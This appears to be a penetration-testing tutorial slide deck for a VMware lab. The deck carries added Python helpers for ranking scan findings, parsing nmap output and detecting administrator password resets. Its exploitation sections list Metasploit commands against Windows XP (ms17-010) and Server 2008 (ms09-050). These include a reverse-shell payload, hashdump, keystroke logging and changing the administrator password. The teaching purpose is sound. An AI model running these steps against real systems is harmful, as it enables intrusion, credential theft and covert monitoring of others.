Free Style Penetration Testing


Post on 11-Jun-2020


Penetration Testing

• Pen-test, Pen-testing

• Ethical hacking techniques

• Weakness in the software systems -> security

• Weak-point

• Websites, Servers, Networks


Vulnerability vs Pen-testing

• Vulnerability testing

  • Just to identify the potential problems

• Pen-testing

  • Attack the problems

• Tools

  • How to leverage

  • Hit the problem

  • Collect data

  • Security analysis

• Tools

  • Scanners

  • Attackers


Step

• List of Vulnerabilities/potential problem

• Rank in the order of priority/criticality

• Penetration tests (attack) -> Networks, Servers, Websites

  • Within network

  • Outside network

• Corrected and fixed systems
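
The listing and ranking steps above can be scripted once scan results are exported. This is an added example, not part of the original slides: it ranks findings from a constructed sample shaped like a Nessus CSV export. The column names, plugin IDs, CVE ids and finding names are assumptions and placeholders.

```python
import csv
import io

RISK_ORDER = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3}

# Constructed sample shaped like a Nessus CSV export. Column names are an
# assumption; plugin IDs, CVE ids and finding names are placeholders.
SAMPLE_CSV = """Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name
90001,,,None,192.168.138.20,tcp,445,Example: SMB service detected
90002,CVE-0000-0002,6.4,Medium,192.168.138.20,tcp,3389,Example: weak remote desktop encryption
90003,CVE-0000-0001,10.0,Critical,192.168.138.10,tcp,445,Example: SMB remote code execution
90003,CVE-0000-0001,10.0,Critical,192.168.138.10,tcp,445,Example: SMB remote code execution
90004,,7.5,High,192.168.138.20,tcp,445,Example: unsupported operating system
90005,,,Low,192.168.138.10,icmp,0,Example: ICMP timestamp disclosure
"""


def _score(row):
    """CVSS as a float; blank or malformed scores sort last within a risk level."""
    try:
        return float(row.get("CVSS") or 0.0)
    except ValueError:
        return 0.0


def rank_findings(csv_text):
    """Drop informational rows and duplicates, then sort most critical first."""
    seen, findings = set(), []
    for row in csv.DictReader(io.StringIO(csv_text)):
        risk = (row.get("Risk") or "").strip()
        key = (row["Plugin ID"], row["Host"], row["Port"])
        if risk not in RISK_ORDER or key in seen:
            continue
        seen.add(key)
        row["Risk"] = risk
        findings.append(row)
    return sorted(findings, key=lambda r: (RISK_ORDER[r["Risk"]], -_score(r), r["Host"]))


def worst_per_host(findings):
    """Highest risk level seen on each host, for deciding which machine to fix first."""
    worst = {}
    for row in findings:
        current = worst.get(row["Host"])
        if current is None or RISK_ORDER[row["Risk"]] < RISK_ORDER[current]:
            worst[row["Host"]] = row["Risk"]
    return worst


if __name__ == "__main__":
    for f in rank_findings(SAMPLE_CSV):
        print(f["Risk"], f["CVSS"] or "-", f["Host"], f["Port"], f["Name"])
```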


Install Vmware Workstation

• Download vmware workstation

• Search “vmware workstation download”

• Select “Workstation 15 Pro for Windows”

• Install “Vmware workstation 15 Pro for Windows”


Install kali linux

• Download Kali linux

• Search “kali linux download”

• Select “Kali linux 64Bit” ISO File

• Create New Virtual Machine

• Select “Typical”

• Select “Installer disc image file(iso)”

• Browse to Kali linux iso file

• Guest Operating system “Linux”

• Version “Debian 9.x 64-bit”


• Virtual machine name “Kali_Linux”

• Location Default

• Specify Disk capacity default

• Select “Store virtual disk as a single file”

• Finish and Install Kali Linux


Customizing Kali Linux

• Install vmware tools

  • cd /media/cdrom0

  • cp VMwareTools-10.2.0-7259539.tar.gz /root

  • cd /root

  • tar -zxvf VMwareTools-10.2.0-7259539.tar.gz

  • cd vmware-tools-distrib

  • ./vmware-install.pl -d

• Run: apt-get update && apt-get upgrade


Install Windows XP

• Copy Windows XP vmdk file (VirtualXPVHD_original.vmdk)

• Create New Virtual Machine

• Select “Custom”

• Choose the virtual machine hardware compatibility -> Default

• Guest Operating System Installation “I will install the operating system later”

• Select a guest operating system “Microsoft Windows”

• Version “Windows XP Professional”

• Virtual machine name: “Windows XP”

• Location : Default

• Processor Configuration : Default


• Memory for the virtual machine : Default

• Network Type “NAT”

• Select I/O Controller Types : Default

• Select a Disk Type : Default

• Select a Disk “Use an existing virtual disk”

• Select an Existing Disk : Browse to file “VirtualXPVHD_original.vmdk”

• Next

• Finish

• Install Windows XP (with no mouse :P)


• Install vmware tools

• Firewall off


Install Windows Server 2008

• Copy Windows Server 2008 ISO File

• Select “Typical”

• Select “I will install the operating system later”

• Browse to Kali linux iso file

• Guest Operating system “Microsoft Windows”

• Version “Windows Server 2008”

• Virtual machine name “Windows Server 2008”

• Location Default

• Specify Disk capacity default

• Select “Store virtual disk as a single file”

• Finish


• Edit Virtual Machine Settings

• Add ISO file image to cd-rom

• Install Windows Server 2008

• Check out “Automatically activate Windows when I’m online”

• Do you want to enter your product key now? “No”

• Select “Windows Server 2008 Standard(Full Installation)”

• Checked “I have selected the edition of Windows that I purchased”

• Next

• Checked “I accept the license terms”


• Which type of installation do you want? “Custom”

• Where do you want to install Windows? “Next”

• Wait…

• Set New Password


Configuring Windows Server 2008 AD

• Install vmware tools

• Add roles

• Next

• Select “Active Directory Domain Services”

• Next

• Install

• Close

• Open “Server manager”


• Select “Roles”

• Click “Active Directory Domain Services”

• Click “Run the Active Directory Domain Services Installation Wizard”

• Next

• Next

• Select “Create a new domain in a new forest”

• Name the forest root domain

• Next

• Next

• Next


• Select “Yes, the computer will use a dynamically…”

• Do you want to continue? Yes

• Next

• Set Password

• Next

• Reboot


Testing Lab Connectivity

• Ping test from Kali Linux to Windows Server 2008

• Nmap test


Basic scanning

• Use nmap

  • “nmap -n -sV 192.168.138.0/24”

• Scan host

  • “nmap -n -sV 192.168.138.X”

• Check for fw

  • “nmap -n -sV 192.168.138.x --reason”
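
Scan output is easier to act on when it is parsed rather than read by eye. This is an added example, not part of the original slides: it reads nmap's grepable output and reports which lab hosts expose SMB (the service both later exercises depend on) and whether any scanned address falls outside the lab subnet. It assumes the scan was saved with nmap's -oG option, which the slides do not use; the sample data is constructed.

```python
import ipaddress

LAB_NET = ipaddress.ip_network("192.168.138.0/24")  # lab subnet used on this page

# Constructed sample in nmap's grepable (-oG) output format; the hosts, the
# out-of-range address and the version strings are made up.
SAMPLE_OG = (
    "# Nmap scan (constructed sample)\n"
    "Host: 192.168.138.10 ()\tStatus: Up\n"
    "Host: 192.168.138.10 ()\tPorts: 135/open/tcp//msrpc//Example RPC/, "
    "445/open/tcp//microsoft-ds//Example SMB service/, "
    "3389/filtered/tcp//ms-wbt-server///\n"
    "Host: 192.168.138.20 ()\tPorts: 53/open/tcp//domain//Example DNS/, "
    "445/open/tcp//microsoft-ds//Example SMB service/\n"
    "Host: 192.168.138.30 ()\tPorts: 22/open/tcp//ssh//Example SSH/\n"
    "Host: 10.0.0.5 ()\tPorts: 445/open/tcp//microsoft-ds///\n"
)


def parse_grepable(text):
    """Return {host: [(port, proto, service, version), ...]} for open ports only."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue  # comment lines
        fields = line.split("\t")
        addr = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue  # e.g. "Status: Up"
            for entry in field[len("Ports: "):].split(", "):
                # port/state/protocol/owner/service/rpcinfo/version/
                p = entry.strip().split("/")
                if len(p) >= 7 and p[1] == "open":
                    hosts.setdefault(addr, []).append((int(p[0]), p[2], p[4], p[6]))
    return hosts


def triage(hosts):
    """Split results into in-lab hosts exposing SMB and hosts outside the lab range."""
    smb, out_of_scope = [], []
    for addr in sorted(hosts, key=ipaddress.ip_address):
        if ipaddress.ip_address(addr) not in LAB_NET:
            out_of_scope.append(addr)
        elif any(port in (139, 445) for port, *_ in hosts[addr]):
            smb.append(addr)
    return smb, out_of_scope
```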


Nessus install in Kali Linux

• Open terminal

• Type “firefox https://www.tenable.com/products/nessus-home &”

• Register and download the amd64 version for Kali Linux

• Check activation code in your email

• cd Downloads

• Install nessus “dpkg -i Nessus-8.1.1-debian6_amd64.deb”

• Start nessus service “/etc/init.d/nessusd start”

• Open nessus web “https://kali:8834”

  • Use root login


Customizing nessus

• Register with activation code


Scanning and hacking Windows XP

• Open nessus web

• New scan

• Select basic network scan

• Fill in windows xp Name,Targets

• Start scan

• See scan result


• Use msfconsole “msfconsole”

• “search ms17-010”

• “use exploit/windows/smb/ms17_010_psexec”

• “set RHOST 192.168.138.X”

• “set LHOST 192.168.138.X”

• “exploit”

• “sysinfo”

• “shell”

• “arp”


• “ifconfig”

• “netstat”

• “ps”

• “screenshot”

• “display /root/xxxx.jpeg”


Scanning and hacking Windows Server 2008

• Open nessus web

• New scan

• Select basic network scan

• Fill in Name,Targets

• Start scan

• See scan result

• Try to hack


• Open Metasploit console “msfconsole”

• Search for vulnerability “search ms09-050”

• Select exploit

  • “use exploit/windows/smb/ms09_050_smb2_negotiate_func_index”

• See information “show info”

• See help “help”

• Set payload

  • “set PAYLOAD windows/meterpreter/reverse_tcp”

• Set Remote Host

  • “set RHOST 192.168.X.X”

• Set Local Host

  • “set LHOST 192.168.X.X”


• Exploit the target host “exploit”

• Get User ID “getuid”

• Go in Windows shell “shell” -> “exit”

• See user file “hashdump”

• See windows screenshot “screenshot”

• Open screenshot “display /root/XXXXX.jpeg” (in terminal)

• List running process “ps”

• Open notepad in Windows Server

• List running process “ps”

• Attach server to process “migrate xxx” (notepad)

• List running process “ps”


• Check process migrate to “getpid”

• Try to keystroke scan “keyscan_start”

• Check keystroke “keyscan_dump”

• Logoff from windows server

• Test Attach server to another process “migrate xxx” (winlogon)

• Can change administrator password

• “shell”

• “net user administrator newpassword”
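
The final step, resetting the administrator password from a SYSTEM-level shell, leaves a trace in the Windows Security log that the lab's defenders can alert on. This is an added example, not part of the original slides: it flags password resets of the built-in Administrator performed as LocalSystem and raises confidence when a shell or net.exe was started as SYSTEM shortly before. It assumes account-management and process-creation auditing are enabled and that events were exported as JSON lines; the sample events are constructed.

```python
import json
from datetime import datetime, timedelta

SYSTEM_SID = "S-1-5-18"  # LocalSystem
SHELL_TOOLS = ("\\cmd.exe", "\\net.exe", "\\net1.exe")
WINDOW = timedelta(seconds=120)

# Constructed sample: Security-log events flattened to JSON lines. Field names
# follow the event XML; computer names, SIDs and times are made up.
SAMPLE = r"""
{"EventID": 4688, "Time": "2020-01-01T10:00:05", "Computer": "LAB-DC", "SubjectUserSid": "S-1-5-18", "NewProcessName": "C:\\Windows\\System32\\cmd.exe"}
{"EventID": 4688, "Time": "2020-01-01T10:00:20", "Computer": "LAB-DC", "SubjectUserSid": "S-1-5-18", "NewProcessName": "C:\\Windows\\System32\\net.exe"}
{"EventID": 4724, "Time": "2020-01-01T10:00:21", "Computer": "LAB-DC", "SubjectUserSid": "S-1-5-18", "TargetUserName": "Administrator", "TargetSid": "S-1-5-21-1111-2222-3333-500"}
{"EventID": 4724, "Time": "2020-01-01T11:30:00", "Computer": "LAB-DC", "SubjectUserSid": "S-1-5-21-1111-2222-3333-1104", "TargetUserName": "alice", "TargetSid": "S-1-5-21-1111-2222-3333-1105"}
{"EventID": 4724, "Time": "2020-01-01T13:00:00", "Computer": "LAB-FS", "SubjectUserSid": "S-1-5-18", "TargetUserName": "Administrator", "TargetSid": "S-1-5-21-4444-5555-6666-500"}
"""


def detect(text):
    """Flag resets of the built-in Administrator (RID 500) performed as SYSTEM."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for e in events:
        e["Time"] = datetime.fromisoformat(e["Time"])
    alerts = []
    for e in events:
        if e["EventID"] != 4724 or e.get("SubjectUserSid") != SYSTEM_SID:
            continue  # 4724: an attempt was made to reset an account's password
        if not e.get("TargetSid", "").endswith("-500"):
            continue
        # 4688 (process creation) for a shell or net.exe as SYSTEM just before
        # the reset on the same computer raises confidence.
        shells = [p["NewProcessName"] for p in events
                  if p["EventID"] == 4688 and p["Computer"] == e["Computer"]
                  and p.get("SubjectUserSid") == SYSTEM_SID
                  and p["NewProcessName"].lower().endswith(SHELL_TOOLS)
                  and timedelta(0) <= e["Time"] - p["Time"] <= WINDOW]
        alerts.append({"computer": e["Computer"], "time": e["Time"].isoformat(),
                       "target": e["TargetUserName"], "shells": shells,
                       "confidence": "high" if shells else "medium"})
    return alerts
```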